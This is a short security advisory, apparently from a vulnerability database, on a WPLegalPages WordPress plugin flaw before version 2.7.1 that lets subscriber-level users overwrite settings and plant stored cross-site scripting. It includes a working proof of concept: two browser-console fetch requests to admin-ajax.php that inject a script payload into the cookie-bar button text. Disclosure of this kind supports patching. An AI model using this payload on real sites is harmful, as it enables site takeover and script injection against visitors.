WPLegalPages < 2.7.1 - Subscriber+ Arbitrary Settings Update to Stored XSS

The plugin does not check for authorisation and has a flawed CSRF logic when saving its settings, allowing any authenticated users, such as subscriber, to update them. Furthermore, due to the lack of sanitisation and escaping, it could lead to Stored Cross-Site Scripting

PoC

Run the below command in the web developer console of the web browser when being authenticated as any user fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: new URLSearchParams({“action”:“lp_save_admin_settings”, “lp-cookie-bar”: “ON”}), “method”: “POST”, “credentials”: “include” });fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: new URLSearchParams({“action”:“save_cookie_bar_form”, “lp-cookie-button-text”: “I agree’);alert(/XSS/);//”}), “method”: “POST”, “credentials”: “include” }); The XSS will be triggered in all frontend pages